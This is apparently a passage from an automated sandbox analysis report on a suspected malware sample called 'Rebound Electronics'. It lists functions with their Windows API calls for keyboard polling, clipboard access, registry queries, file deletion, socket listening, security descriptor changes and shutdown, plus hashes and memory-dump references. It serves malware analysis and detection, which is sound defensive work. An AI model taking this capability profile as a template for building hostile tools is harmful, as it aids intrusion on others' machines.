FindNextFileW.KERNEL32(00000000,00000010), ref: 00C71DA5
FindClose.KERNEL32(00000000), ref: 00C71DB2
FindClose.KERNEL32(00000000), ref: 00C71DC2

Strings

*.*, xrefs: 00C71D28

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 68896d4c16f97913eb51e6bf3aa5426000674c219ed10d8cac9309512b07760a
Instruction ID: 93c4b2efa153814dd12eeddf54c6f6fbcd7839fea85d9f45bde7a0677c382cad
Opcode Fuzzy Hash: 68896d4c16f97913eb51e6bf3aa5426000674c219ed10d8cac9309512b07760a
Instruction Fuzzy Hash: 783109325006196BCF21AFA8DC49BDE77AC9F45324F188562ED1AA3190DB70DF45CF50

Function 00C27D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C27DBD

Strings

[:<:]], xrefs: 00C27D1D
Q\E, xrefs: 00C286D6
[:>:]], xrefs: 00C27D37
[, xrefs: 00C27E14
\b(?=\w), xrefs: 00C9F85E
], xrefs: 00C27D9F
\, xrefs: 00C27E1D
\b(?<=\w), xrefs: 00C9F877
^, xrefs: 00C27D96
\, xrefs: 00C27D89
\, xrefs: 00C9F95B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 0ec497a32788d60268b5f81d89d34f9edd0d74f3be35b7d600c6ebaec6eeee71
Instruction ID: 76ea5087e0593a3bdc747b1bfe460bd986c018879629d7cfd95da13ceec7088f
Opcode Fuzzy Hash: 0ec497a32788d60268b5f81d89d34f9edd0d74f3be35b7d600c6ebaec6eeee71
Instruction Fuzzy Hash: 7E82D071D04229CFCF24CF98D8847ADB7B1BF44314F25826AD829AB781E7349E85DB90

Function 00C7091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C709DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C709EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C709FB
__wsplitpath.LIBCMT ref: 00C70A59
_wcscat.LIBCMT ref: 00C70A71
_wcscat.LIBCMT ref: 00C70A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C70A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00C70AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00C70ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00C70AFF
_wcscpy.LIBCMT ref: 00C70B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C70B4A

Strings

*.*, xrefs: 00C70B05

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: dcdb648c3f8c042b66603e64d3a4157b1cc8e06498236726af6a49dec535dcbb
Instruction ID: e558f7aec44e0dd24a6582ce78d0b6b6669dc02b5a7886986c12ebcd6487ee6c
Opcode Fuzzy Hash: dcdb648c3f8c042b66603e64d3a4157b1cc8e06498236726af6a49dec535dcbb
Instruction Fuzzy Hash: DA614AB25043059FDB10EF60C885A9EB3E8FF89314F14891EF99AC7251DB31EA45CB92

Function 00C5A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C5ABD7
Part of subcall function 00C5ABBB: GetLastError.KERNEL32(?,00C5A69F,?,?,?), ref: 00C5ABE1
Part of subcall function 00C5ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00C5A69F,?,?,?), ref: 00C5ABF0
Part of subcall function 00C5ABBB: HeapAlloc.KERNEL32(00000000,?,00C5A69F,?,?,?), ref: 00C5ABF7
Part of subcall function 00C5ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C5AC0E

Part of subcall function 00C5AC56: GetProcessHeap.KERNEL32(00000008,00C5A6B5,00000000,00000000,?,00C5A6B5,?), ref: 00C5AC62
Part of subcall function 00C5AC56: HeapAlloc.KERNEL32(00000000,?,00C5A6B5,?), ref: 00C5AC69
Part of subcall function 00C5AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C5A6B5,?), ref: 00C5AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C5A6D0
_memset.LIBCMT ref: 00C5A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C5A704
GetLengthSid.ADVAPI32(?), ref: 00C5A715
GetAce.ADVAPI32(?,00000000,?), ref: 00C5A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C5A76E
GetLengthSid.ADVAPI32(?), ref: 00C5A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C5A79A
HeapAlloc.KERNEL32(00000000), ref: 00C5A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C5A7C2
CopySid.ADVAPI32(00000000), ref: 00C5A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C5A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C5A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C5A834

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 6f0b4ef3bf207981c715a337694c77fa750376cc9394d33a3f1de7342fa94cf9
Instruction ID: 7f56afa4c316b050b50e415637fa70d4348e26b611b61892eddc49e17821c6b6
Opcode Fuzzy Hash: 6f0b4ef3bf207981c715a337694c77fa750376cc9394d33a3f1de7342fa94cf9
Instruction Fuzzy Hash: B0516E75900209AFDF00DF95DC44EEEBBB9FF05305F048229F922A7290DB359A49CB65

Function 00C26F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 00CA2D7E
NO_START_OPT), xrefs: 00CA2CD1
CR), xrefs: 00CA2E09
LF), xrefs: 00CA2E26
ANY), xrefs: 00CA2E60
BSR_UNICODE), xrefs: 00CA2EBA
UTF16), xrefs: 00CA2C56
LIMIT_MATCH=, xrefs: 00CA2CF2
BSR_ANYCRLF), xrefs: 00CA2EA0
UTF), xrefs: 00CA2C7C
NO_AUTO_POSSESS), xrefs: 00CA2CB0
CRLF), xrefs: 00CA2E43
UCP), xrefs: 00CA2C8F
ANYCRLF), xrefs: 00CA2E7D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 8d5d60a5fa06accd4137f7e98d1735290062ec782e410ed65aebc77c20327203
Instruction ID: aae15d04367d67442f85030c2528227b3fa447d851d7465dc61fdcb6741a3639
Opcode Fuzzy Hash: 8d5d60a5fa06accd4137f7e98d1735290062ec782e410ed65aebc77c20327203
Instruction Fuzzy Hash: 9D729171E0422ACBDF24CF99D8807AEB7B5BF09314F14416AE915EB680DB709E81DF90

Function 00C663F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C66EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C65FA6,?), ref: 00C66ED8

Part of subcall function 00C672CB: GetFileAttributesW.KERNEL32(?,00C66019), ref: 00C672CC

_wcscat.LIBCMT ref: 00C66441
__wsplitpath.LIBCMT ref: 00C6645F
FindFirstFileW.KERNEL32(?,?), ref: 00C66474
_wcscpy.LIBCMT ref: 00C664A3
_wcscat.LIBCMT ref: 00C664B8
_wcscat.LIBCMT ref: 00C664CA
DeleteFileW.KERNEL32(?), ref: 00C664DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C664EB
FindClose.KERNEL32(00000000), ref: 00C66506

Strings

\*.*, xrefs: 00C6643B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: c02da8cb243315cb150647e77eb9c3f2ce03a864a62693028fb14e1f184329a0
Instruction ID: 04742a422a909c301b2bd7a65e60f5c53cd2cba37e3c43cb5b35ca812bb449d8
Opcode Fuzzy Hash: c02da8cb243315cb150647e77eb9c3f2ce03a864a62693028fb14e1f184329a0
Instruction Fuzzy Hash: B331A2B2408384AAC731DBA488C5ADF77DCAF56314F04092EF6DAC3141EA35D60997A7

Function 00C831BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C82BB5,?,?), ref: 00C83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C8328E

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C8332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C833C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C83604
RegCloseKey.ADVAPI32(00000000), ref: 00C83611

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f40ba50005d86d55424091d1710815b826005b6d6926d0fb5ed669d37f0b2586
Instruction ID: aa4029565eb746ee0357819d90aab5290cb2181891533e682e22a675e65304b2
Opcode Fuzzy Hash: f40ba50005d86d55424091d1710815b826005b6d6926d0fb5ed669d37f0b2586
Instruction Fuzzy Hash: D9E16D31604210AFCB14EF29C891E2EBBE8EF89714F04846DF55AD72A1DB30EE05DB56

Function 00C62B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C62B5F
GetAsyncKeyState.USER32(000000A0), ref: 00C62BE0
GetKeyState.USER32(000000A0), ref: 00C62BFB
GetAsyncKeyState.USER32(000000A1), ref: 00C62C15
GetKeyState.USER32(000000A1), ref: 00C62C2A
GetAsyncKeyState.USER32(00000011), ref: 00C62C42
GetKeyState.USER32(00000011), ref: 00C62C54
GetAsyncKeyState.USER32(00000012), ref: 00C62C6C
GetKeyState.USER32(00000012), ref: 00C62C7E
GetAsyncKeyState.USER32(0000005B), ref: 00C62C96
GetKeyState.USER32(0000005B), ref: 00C62CA8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: bf8295ea485b3663200bf205293ae30bafefd5d7a0109454032de76b381954c5
Instruction ID: 6a3d28f217b75b748f087968def4d847f2893f043cda12d2d0252ee9cabb590a
Opcode Fuzzy Hash: bf8295ea485b3663200bf205293ae30bafefd5d7a0109454032de76b381954c5
Instruction Fuzzy Hash: 3741E774A04FC97EFF349B6088847A9BEA0AF52344F048059D9D7576C1DB949BC4C7A2

Function 00C76D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C76D2E
EmptyClipboard.USER32 ref: 00C76D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00C76D49
CloseClipboard.USER32 ref: 00C76DE8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 9bf1651aba2e0ec36ee8b8049d166c7043c295b55f5e2abbf89698d361306bb2
Instruction ID: dbc6070260eb165567c9a53c6a926f6c85ead0146d65f3807df97f3b22b13f03
Opcode Fuzzy Hash: 9bf1651aba2e0ec36ee8b8049d166c7043c295b55f5e2abbf89698d361306bb2
Instruction Fuzzy Hash: FC219A31310610AFEB21AF65EC89B6D77A8EF55714F04C41AF94BDB2A1CB34ED009B95

Function 00C7C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00C59ABF: CLSIDFromProgID.OLE32 ref: 00C59ADC
Part of subcall function 00C59ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C59AF7
Part of subcall function 00C59ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00C59B05
Part of subcall function 00C59ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C59B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C7C235
_memset.LIBCMT ref: 00C7C242
_memset.LIBCMT ref: 00C7C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00C7C38C
CoTaskMemFree.OLE32(?), ref: 00C7C397

Strings

NULL Pointer assignment, xrefs: 00C7C3E5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: db74c8f39873c79b26e475de13c560ceda6c59b65666623046652db0a4f25718
Instruction ID: e67700df71e1107e9efb817674de725bc9bd8f253dde3132ba46606c7eb2becb
Opcode Fuzzy Hash: db74c8f39873c79b26e475de13c560ceda6c59b65666623046652db0a4f25718
Instruction Fuzzy Hash: 74914B71D00229ABDB10DF94DC85EEEBBB9EF08710F10816AF519A7291DB709A45DFA0

Function 00C679D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5B180
Part of subcall function 00C5B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5B1AD
Part of subcall function 00C5B134: GetLastError.KERNEL32 ref: 00C5B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00C67A0F

Strings

SeShutdownPrivilege, xrefs: 00C679DD
@, xrefs: 00C67A02
, xrefs: 00C679FD

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 3afa54480ec31712922dbc18a83d86b5e7c598d75547f6098f8fe74b975ccf29
Instruction ID: 01756aac6793780a298149cda3b73461015dd388490629e9003f9c2eee5928b6
Opcode Fuzzy Hash: 3afa54480ec31712922dbc18a83d86b5e7c598d75547f6098f8fe74b975ccf29
Instruction Fuzzy Hash: 2901F7716582116AF73816B4CCCABBF3258DB00358F242F25BE23E20C3D6605F00A1A4

Function 00C78C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C78CA8
WSAGetLastError.WSOCK32(00000000), ref: 00C78CB7
bind.WSOCK32(00000000,?,00000010), ref: 00C78CD3
listen.WSOCK32(00000000,00000005), ref: 00C78CE2
WSAGetLastError.WSOCK32(00000000), ref: 00C78CFC
closesocket.WSOCK32(00000000,00000000), ref: 00C78D10

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: d02ff89dab0592579dbfcecf6c0c7d59e468f41965efc4089c2cc86eb95a8dd0
Instruction ID: de8092f8663575266612dffd19cec3f634ac94ee353d5042cc5e03c386140065
Opcode Fuzzy Hash: d02ff89dab0592579dbfcecf6c0c7d59e468f41965efc4089c2cc86eb95a8dd0
Instruction Fuzzy Hash: BE2101316002019FCB24EF68D888B6EB3A8EF49324F10C108F95BE72D2CB30AD45DB61

Function 00C66532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C66554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00C66564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00C66583
__wsplitpath.LIBCMT ref: 00C665A7
_wcscat.LIBCMT ref: 00C665BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00C665F9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 86dd68a1444a63d751d869f978828f64a06846928708a850dfe952f70a737bc6
Instruction ID: d103f07e9ef26f53a4157c0c82bfbda00586478a8eaf6d0471feb5ad6f2ddefa
Opcode Fuzzy Hash: 86dd68a1444a63d751d869f978828f64a06846928708a850dfe952f70a737bc6
Instruction Fuzzy Hash: 52216571900219ABDB20AFA4CCC9FEDB7BCAB45314F5004A5E546D7141DB719F85CF61

Function 00C7923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C7A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00C79296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 00C792B9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 839c113158043259d392aff23e33909f89d4a9750ac6ad530dae90d386bb3165
Instruction ID: 9eb7afa4c488d71b5f4a1ae5ef42680219797724596bc22f1537534c46ff3f3d
Opcode Fuzzy Hash: 839c113158043259d392aff23e33909f89d4a9750ac6ad530dae90d386bb3165
Instruction Fuzzy Hash: 8241C270600210AFDB14AB68C882F7EB7EDEF44728F148448F956EB3D2CB749D019B91

Function 00C6EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C6EB8A
_wcscmp.LIBCMT ref: 00C6EBBA
_wcscmp.LIBCMT ref: 00C6EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 00C6EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C6EC0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

